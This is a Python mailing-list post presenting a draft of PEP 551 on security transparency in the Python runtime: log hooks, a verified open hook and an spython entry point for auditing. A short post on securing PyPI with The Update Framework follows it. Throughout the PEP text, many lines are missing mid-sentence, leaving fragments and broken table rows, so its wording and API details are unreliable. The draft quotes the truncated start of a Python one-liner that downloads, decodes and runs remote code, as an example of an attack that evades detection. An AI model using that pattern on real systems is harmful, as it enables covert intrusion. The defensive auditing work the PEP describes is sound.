Those of you who were at the PyCon US language summit this year (or who
saw the coverage at https://lwn.net/Articles/723823/) may recall that I
talked briefly about the ways Python is used by attackers to gain and/or
retain access to systems on local networks.
This comes out of work we've been doing at Microsoft to balance the
flexibility of scripting languages with their usefulness to malicious
users. PowerShell in particular has had a lot of work done, and we've
been doing the same internally for Python. Things like transcripting
(log every piece of code when it is compiled) and signature validation
(prevent loading unsigned code).
This PEP is about upstreaming enough functionality to make it easier to
maintain these features - it is *not* intended to add specific security
features to the core release. The aim is to be able to use a standard
libpython3.7/python37.dll with a custom python3.7/python.exe that adds
those features (listed in the PEP).
Right now parts of the PEP is incomplete. In particular, the
Recommendations section is much shorter than I intend, the list of log
hook locations is also too short, and I have only done a preliminary
performance analysis. But it's time to get reviews of the overall
concept. I'd also like to take suggestions for more hook locations and
relevant recommendations, so feel free to throw them out there. In
particular, I'm not as up to date on best practices for non-Windows
platforms as the rest of the list, so feel free to correct or improve
Because ReST+max 80 character width makes tables completely unreadable
in source, I suggest reading it at
https://github.com/python/peps/blob/master/pep-0551.rst but I've
included the full text below for quoting purposes.
My current implementation is available at
https://github.com/zooba/cpython/tree/sectrans and should work on both
Windows and Linux. I hope to take this to python-dev by next week and
spend the dev sprints getting the PEP to the point where it can be accepted.
Title: Security transparency in the Python runtime
Author: Steve Dower <steve.dower(a)python.org>
Type: Standards Track
This PEP describes additions to the Python API and specific behaviors
CPython implementation that make actions taken by the Python runtime
security and auditing tools. The goals in order of increasing importance
prevent malicious use of Python, to detect and report on malicious use,
importantly to detect attempts to bypass detection. Most of the
for implementation is required from users, who must customize and build
for their own environment.
We propose two small sets of public APIs to enable users to reliably
copy of Python without having to modify the core runtime, protecting future
maintainability. We also discuss recommendations for users to help them
and configure their copy of Python.
Software vulnerabilities are generally seen as bugs that enable remote or
elevated code execution. However, in our modern connected world, the more
dangerous vulnerabilities are those that enable advanced persistent threats
(APTs). APTs are achieved when an attacker is able to penetrate a network,
establish their software on one or more machines, and over time extract
intelligence. Some APTs may make themselves known by maliciously
or hardware (e.g., `Stuxnet
Most attempt to hide their existence and avoid detection. APTs often use a
combination of traditional vulnerabilities, social engineering, phishing (or
spear-phishing), thorough network analysis, and an understanding of
misconfigured environments to establish themselves and do their work.
The first infected machines may not be the final target and may not require
special privileges. For example, an APT that is established as a
non-administrative user on a developer’s machine may have the ability to
to production machines through normal deployment channels. It is common
to persist on as many machines as possible, with sheer weight of
them difficult to remove completely.
Whether an attacker is seeking to cause direct harm or hide their
biggest barrier to detection is a lack of insight. System administrators
large networks rely on distributed logs to understand what their
doing, but logs are often filtered to show only error conditions. APTs
attempting to avoid detection will rarely generate errors or abnormal
Reviewing normal operation logs involves a significant amount of effort,
work is underway by a number of companies to enable automatic anomaly
within operational logs. The tools preferred by attackers are ones that are
already installed on the target machines, since log messages from these
are often expected and ignored in normal use.
At this point, we are not going to spend further time discussing the
of APTs or methods and mitigations that do not apply to this PEP. For
information about the field, we recommend reading or watching the resources
listed under `Further Reading`_.
Python is a particularly interesting tool for attackers due to its
server and developer machines, its ability to execute arbitrary code
data (as opposed to native binaries), and its complete lack of internal
This allows attackers to download, decrypt, and execute malicious code
python -c "import urllib.request, base64;
This command currently bypasses most anti-malware scanners that rely on
recognizable code being read through a network connection or being
disk (base64 is often sufficient to bypass these checks). It also bypasses
protections such as file access control lists or permissions (no file access
occurs), approved application lists (assuming Python has been approved
uses), and automated auditing or logging (assuming Python is allowed to
the internet or access another machine on the local network from which
General consensus among the security community is that totally preventing
attacks is infeasible and defenders should assume that they will often
attacks only after they have succeeded. This is known as the "assume breach"
mindset. _ In this scenario, protections such as sandboxing and input
validation have already failed, and the important task is detection,
and eventual removal of the malicious code. To this end, the primary feature
required from Python is security transparency: the ability to see what
operations the Python runtime is performing that may indicate anomalous or
malicious use. Preventing such use is valuable, but secondary to the need to
know that it is occurring.
To summarise the goals in order of increasing importance:
* preventing malicious use is valuable
* detecting malicious use is important
* detecting attempts to bypass detection is critical
One example of a scripting engine that has addressed these challenges is
PowerShell, which has recently been enhanced towards similar goals of
transparency and prevention. _
Generally, application and system configuration will determine which events
within a scripting engine are worth logging. However, given the value of
logs events are not recognized until after an attack is detected, it is
important to capture as much as possible and filter views rather than
at the source (see the No Easy Breach video from above). Events that are
of interest include attempts to bypass event logging, attempts to load and
execute code that is not correctly signed or access-controlled, use of
operating system functionality such as debugging or inter-process inspection
tools, most network access and DNS resolution, and attempts to create
files or configuration settings on the local machine.
To summarize, defenders have a need to audit specific uses of Python in
detect abnormal or malicious usage. Currently, the Python runtime does not
provide any ability to do this, which (anecdotally) has led to organizations
switching to other languages. The aim of this PEP is to enable system
administrators to deploy a security transparent copy of Python that can
integrate with their existing auditing and protection systems.
On Windows, some specific features that may be enabled by this include:
* Script Block Logging _
* DeviceGuard _
* AMSI _
* Persistent Zone Identifiers _
* Event tracing (which includes event forwarding) _
On Linux, some specific features that may be integrated are:
* gnupg _
* sd_journal _
* OpenBSM _
* syslog _
* check execute bit on imported modules
On macOS, some features that may be used with the expanded APIs are:
* OpenBSM _
* syslog _
Overall, the ability to enable these platform-specific features on
machines is highly appealing to system administrators and will make Python a
more trustworthy dependency for application developers.
Overview of Changes
True security transparency is not fully achievable by Python in
runtime can log as many events as it likes, but unless the logs are
analyzed there is no value. Python may impose restrictions in the name of
security, but usability may suffer. Different platforms and environments
require different implementations of certain security features, and
organizations with the resources to fully customize their runtime should be
encouraged to do so.
The aim of these changes is to enable system administrators to integrate
into their existing security systems, without dictating what those
like or how they should behave. We propose two API changes to enable
Event Log Hook and Verified Open Hook. Both are not set by default, and both
require modifying the appropriate entry point to enable any
the purposes of validation and example, we propose a new spython/spython.exe
entry point program that enables some basic functionality using these hooks.
However, the expectation is that security-conscious organizations will
their own entry points to meet their needs.
Event Log Hook
In order to achieve security transparency, an API is required to raise
from within certain operations. These operations are typically deep
Python runtime or standard library, such as dynamic code compilation, module
imports, DNS resolution, or use of certain modules such as ``ctypes``.
The new APIs required for log hooks are::
# Add a logging hook
sys.addloghook(hook: Callable[str, tuple]) -> None
int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));
# Raise an event with all logging hooks
sys.loghook(str, *args) -> None
int PySys_LogHook(const char *event, PyObject *args);
# Internal API used during Py_Finalize() - not publicly accessible
Hooks are added by calling ``PySys_AddLogHook()`` from C at any time,
before ``Py_Initialize()``, or by calling ``sys.addloghook()`` from
Hooks are never removed or replaced, and existing hooks have an
refuse to allow new hooks to be added (adding a logging hook is logged,
preexisting hooks can raise an exception to block the new addition).
When events of interest are occurring, code can either call
from C (while the GIL is held) or ``sys.loghook()``. The string argument
name of the event, and the tuple contains arguments. A given event name
have a fixed schema for arguments, and both arguments are considered a
API (for a given x.y version of Python), and thus should only change between
feature releases with updated documentation.
When an event is logged, each hook is called in the order it was added
event name and tuple. If any hook returns with an exception set, later
ignored and *in general* the Python runtime should terminate. This is
intentional to allow hook implementations to decide how to respond to any
particular event. The typical responses will be to log the event, abort the
operation with an exception, or to immediately terminate the process with an
operating system exit call.
When an event is logged but no hooks have been set, the ``loghook()``
should include minimal overhead. Ideally, each argument is a reference to
existing data rather than a value calculated just for the logging call.
As hooks may be Python objects, they need to be freed during
To do this, we add an internal API ``_Py_ClearLogHooks()`` that releases any
``PyObject*`` hooks that are held, as well as any heap memory used. This
internal function with no public export, but it passes an event to all
hooks to ensure that unexpected calls are logged.
See `Log Hook Locations`_ for proposed log hook points and schemas, and the
`Recommendations`_ section for discussion on appropriate responses.
Verified Open Hook
Most operating systems have a mechanism to distinguish between files
that can be
executed and those that can not. For example, this may be an execute bit
permissions field, or a verified hash of the file contents to detect
code tampering. These are an important security mechanism for preventing
execution of data or code that is not approved for a given environment.
Currently, Python has no way to integrate with these when launching
The new public API for the verified open hook is::
# Set the handler
int Py_SetOpenForExecuteHandler(PyObject *(*handler)(const char
*narrow, const wchar_t *wide))
# Open a file using the handler
The ``os.open_for_exec()`` function is a drop-in replacement for
``open(pathlike, 'rb')``. Its default behaviour is to open a file for raw,
binary access - any more restrictive behaviour requires the use of a custom
handler. (Aside: since ``importlib`` requires access to this function
``os`` module has been imported, it will be available on the
modules, but the intent is that other users will access it through the
A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()``
at any time, including before ``Py_Initialize()``. When
called with a handler set, the handler will be passed the processed
wide path, depending on platform, and its return value will be returned
directly. The returned object should be an open file-like object that
reading raw bytes. This is explicitly intended to allow a ``BytesIO``
if the open handler has already had to read the file into memory in order to
perform whatever verification is necessary to determine whether the
permitted to be executed.
Note that these handlers can import and call the ``_io.open()`` function on
CPython without triggering themselves.
If the handler determines that the file is not suitable for execution,
raise an exception of its choice, as well as performing any other logging or
All import and execution functionality involving code from a file will be
changed to use ``open_for_exec()`` unconditionally. It is important to
calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
function - a log hook that includes the code from these calls will be
is the best opportunity to validate code that is read from the file.
current decoupling between import and execution in Python, most imported
will go through both ``open_for_exec()`` and the log hook for
so care should be taken to avoid repeating verification steps.
While all the functions added here are considered public and stable API, the
behavior of the functions is implementation specific. The descriptions here
refer to the CPython implementation, and while other implementations should
provide the functions, there is no requirement that they behave the same.
For example, ``sys.addloghook()`` and ``sys.loghook()`` should exist but
nothing. This allows code to make calls to ``sys.loghook()`` without
test for existence, but it should not assume that its call will have any
(Including existence tests in security-critical code allows another
bypass logging, so it is preferable that the function always exist.)
``os.open_for_exec()`` should at a minimum always return
'rb')``. Code using the function should make no further assumptions
may occur, and implementations other than CPython are not required to let
developers override the behavior of this function with a hook.
Log Hook Locations
Calls to ``sys.loghook()`` or ``PySys_LogHook()`` will be added to the
operations with the schema in Table 1. Unless otherwise specified, the
for log hooks to abort any listed operation should be considered part of the
rationale for including the hook.
.. csv-table:: Table 1: Log Hooks
:header: "API Function", "Event Name", "Arguments", "Rationale"
:widths: 2, 2, 3, 6
``PySys_AddLogHook``, ``sys.addloghook``, "", "Detect when new log
``_PySys_ClearLogHooks``, ``sys._clearloghooks``, "", "Notifies
are being cleaned up, mainly in case the event is triggered
This event cannot be aborted."
``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "",
any attempt to set the ``open_for_execute`` handler."
"``compile``, ``exec``, ``eval``, ``PyAst_CompileString``",
``(code, filename_or_none)``", "Detect dynamic code compilation.
this will also be called for regular imports of source code,
that used ``open_for_exec``."
``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
sys.path_hooks)``", "Detect when modules are imported. This is
the module name is resolved to a file. All arguments other than the
name may be ``None`` if they are not used or available."
"``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
``(module_or_path,)``", "Detect when native modules are used."
``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``",
information about specific symbols retrieved from native modules."
``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect
is accessing arbitrary memory using ``ctypes``"
``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing
the id of
objects, which in CPython reveals information about memory layout."
``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect
code is accessing frames directly"
``sys._current_frames``, ``sys._current_frames``, "", "Detect when
accessing frames directly"
``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is
trace functions. Because of the implementation, exceptions raised
hook will abort the operation, but will not be raised in Python
that ``threading.setprofile`` eventually calls this function, so the
will be logged for each thread."
``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is
trace functions. Because of the implementation, exceptions raised
hook will abort the operation, but will not be raised in Python
that ``threading.settrace`` eventually calls this function, so the event
will be logged for each thread."
``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", "
Detect changes to async generator hooks."
``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", "
Detect changes to async generator hooks."
``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "",
changes to the coroutine wrapper."
Detect changes to the recursion limit."
", "Detect changes to the switching interval."
"``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
``socket.sendmsg``, ``socket.sendto``", ``socket.address``,
", "Detect access to network resources. The address is unmodified
``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect
creation of sockets. The arguments will be int values."
``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to
retrieve the current host name."
``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect
attempts to change the current host name. The name argument is
passed as a
"``socket.gethostbyname``, ``socket.gethostbyname_ex``", "
``socket.gethostbyname``", "``(name,)``", "Detect host name
name argument is a str or bytes object."
host resolution. The address argument is a str or bytes object."
``socket.getservbyname``, ``socket.getservbyname``, "``(name,
Detect service resolution. The arguments are str objects."
``socket.getservbyport``, ``socket.getservbyport``, "``(port,
Detect service resolution. The port argument is an int and protocol is a
TODO - more hooks in ``_socket``, ``_ssl``, others?
SPython Entry Point
A new entry point binary will be added, called ``spython.exe`` on
``spythonX.Y`` on other platforms. This entry point is intended
primarily as an
example, as we expect most users of this functionality to implement
entry point and hooks (see `Recommendations`_). It will also be used for
Source builds will create ``spython`` by default, but distributors may
whether to include ``spython`` in their pre-built packages. The python.org
managed binary distributions will not include ``spython``.
**Do not accept most command-line arguments**
The ``spython`` entry point requires a script file be passed as the first
argument, and does not allow any options. This prevents arbitrary code
from in-memory data or non-script files (such as pickles, which can be
using ``-m pickle <path>``.
Options ``-B`` (do not write bytecode), ``-E`` (ignore environment
and ``-s`` (no user site) are assumed.
If a file with the same full path as the process with a ``._pth`` suffix
(``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it
used to initialize ``sys.path`` following the rules currently described `for
**Log security events to a file**
Before initialization, ``spython`` will set a log hook that writes
events to a
local file. By default, this file is the full path of the process with a
``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
variable (despite such overrides being explicitly discouraged in
The log hook will also abort all ``addloghook`` events, preventing any other
hooks from being added.
On Windows, code from ``compile`` events will submitted to AMSI _ and
fails to validate, the compile event will be aborted. This can be tested by
calling ``compile()`` or ``eval()`` on the contents of the `EICAR test file
**Restrict importable modules**
Also before initialization, ``spython`` will set an open-for-execute
validates all files opened with ``os.open_for_exec``. This
require all files to have a ``.py`` suffix (thereby blocking the use of
bytecode), and will raise a custom log message ``spython.open_for_exec``
containing ``(filename, True_if_allowed)``.
On Windows, the hook will also open the file with flags that prevent any
process from opening it with write access, which allows the hook to perform
additional validation on the contents with confidence that it will not be
modified between the check and use. Compilation will later trigger a
event, so there is no need to read the contents now for AMSI, but other
validation mechanisms such as DeviceGuard _ should be performed here.
Full impact analysis still requires investigation. Preliminary testing shows
that calling ``sys.loghook`` with no hooks added does not significantly
any existing benchmarks, though targeted microbenchmarks can observe an
Performance impact using ``spython`` or with hooks added are not of interest
here, since this is considered opt-in functionality.
Specific recommendations are difficult to make, as the ideal
configuration for any environment will depend on the user's ability to
manage, monitor, and respond to activity on their own network. However,
many of the proposals here do not appear to be of value without deeper
illustration. This section provides recommendations using the terms
**should** (or **should not**), indicating that we consider it dangerous
to ignore the advice, and **may**, indicating that for the advice ought
to be considered for high value systems. The term **sysadmins** refers
to whoever is responsible for deploying Python throughout your network,
though different organizations may have different titles for the
Sysadmins **should** build their own entry point, likely starting from
``spython``, and directly interface with the security systems available
in their environment. The more tightly integrated, the less likely a
vulnerability will be found allowing an attacker to bypass those
systems. In particular, the entry point **should not** obtain any
settings from the current environment, such as environment variables,
unless those settings are otherwise protected from modification.
The default ``python`` entry point **should not** be deployed to
production machines, but could be given to developers to use and test
Python on non-production machines. Sysadmins **may** consider deploying
a less restrictive version of their entry point to developer machines,
since any system connected to your network is a potential target.
Python deployments **should** be made read-only using any available
platform functionality after deployment and during use.
On platforms that support it, sysadmins **should** include signatures
for every file in a Python deployment, ideally verified using a private
certificate. For example, Windows supports embedding signatures in
executable files and using catalogs for others, and can use DeviceGuard
_ to validate signatures either automatically or using an
Sysadmins **should** collect as many logged events as possible, and
**should** copy them off of local machines frequently. Even if logs are
not being constantly monitored for suspicious activity, once an attack
is detected it is too late to enable logging. Log hooks **should not**
attempt to preemptively filter events, as even benign events are useful
when analyzing the progress of an attack. (Watch the "No Easy Breach"
video under `Further Reading`_ for a deeper look at this side of things.)
Log hooks **should** write events to logs before attempting to abort. As
discussed earlier, it is more important to record malicious actions than
to prevent them. Very few actions should be aborted, as most will occur
during normal use. Sysadmins **may** audit their Python code and abort
operations that are known to never be used deliberately.
On production machines, the first log hook **should** be set in C code
before ``Py_Initialize`` is called, and that hook **should**
unconditionally abort the ``sys.addloghook`` event. The Python interface
is mainly useful for testing.
On production machines, a non-validating ``open_for_exec`` hook **may**
be set in C code before ``Py_Initialize`` is called. This prevents later
code from overriding the hook, however, logging the
``setopenforexecutehandler`` event is useful since no code should ever
need to call it. Using at least the sample ``open_for_exec`` hook
implementation from ``spython`` is recommended.
[TODO: more good advice; less bad advice]
**Redefining Malware: When Old Terms Pose New Threats**
By Aviv Raff for SecurityWeek, 29th January 2014
This article, and those linked by it, are high-level summaries of
the rise of
APTs and the differences from "traditional" malware.
**Anatomy of a Cyber Attack**
By FireEye, accessed 23rd August 2017
A summary of the techniques used by APTs, and links to a number of
**Automated Traffic Log Analysis: A Must Have for Advanced Threat
By Aviv Raff for SecurityWeek, 8th May 2014
High-level summary of the value of detailed logging and automatic
**No Easy Breach: Challenges and Lessons Learned from an Epic
Video presented by Matt Dunwoody and Nick Carr for Mandiant at
Detailed walkthrough of the processes and tools used in detecting
**Disrupting Nation State Hackers**
Video presented by Rob Joyce for the NSA at USENIX Enigma 2016
Good security practices, capabilities and recommendations from the
NSA's Tailored Access Operation.
..  Assume Breach Mindset, `<http://asian-power.com/node/11144>`_
..  PowerShell Loves the Blue Team, also known as Scripting Security and
Protection Advances in Windows 10,
..  `<https://aka.ms/deviceguard>`_
..  AMSI,
..  Persistent Zone Identifiers,
..  Event tracing,
..  `<https://www.gnupg.org/>`_
..  `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_
..  `<http://www.trustedbsd.org/openbsm.html>`_
..  `<https://linux.die.net/man/3/syslog>`_
Thanks to all the people from Microsoft involved in helping make the Python
runtime safer for production use, and especially to James Powell for
of the initial research, analysis and implementation, Lee Holmes for
insights into the info-sec field and PowerShell's responses, and Brett
for the grounding discussions.
Copyright (c) 2017 by Microsoft Corporation. This material may be
only subject to the terms and conditions set forth in the Open Publication
License, v1.0 or later (the latest version is presently available at
This is more of a PyPI security discussion than a core Python issue, but I figured I'd bring attention to it anyway:
The PEP authors are revising the proposed summary, title, etc., per https://github.com/secure-systems-lab/peps/blob/c13384a4fac6822626abb7e09ab… :
> Attacks on software repositories are common, even in organizations with very
good security practices__. The resulting repository compromise allows an
attacker to edit all files stored on the repository and sign these files using
any keys stored on the repository (online keys). In many signing schemes (like
TLS), this access allows the attacker to replace files on the repository and
make it look like these files are coming from PyPI. Without a way to revoke and
replace the trusted private key, it is very challenging to recover from a
repository compromise. In addition to the dangers of repository compromise,
software repositories are vulnerable to an attacker on the network (MITM)
intercepting and changing files. These and other attacks on software
repositories are detailed here__. This PEP aims to protect users of PyPI from
compromises of the integrity, consistency and freshness properties of PyPI
packages, and enhances compromise resilience, by mitigating key risk and
providing mechanisms to recover from a compromise of PyPI or its signing keys.
In addition to protecting direct users of PyPI, this PEP aims to provide similar
protection for users of PyPI mirrors.
> To provide compromise resilient protection of PyPI, this PEP proposes the use of
The Update Framework _ (TUF). .....
> This PEP describes changes to the PyPI infrastructure that are needed to ensure
that users get valid packages from PyPI. ...
> __ https://github.com/theupdateframework/pip/wiki/Attacks-on-software-reposito…
> __ https://theupdateframework.github.io/security.html
Discussion should probably be directed to the Discourse thread at discuss.python.org ; this is just a heads-up.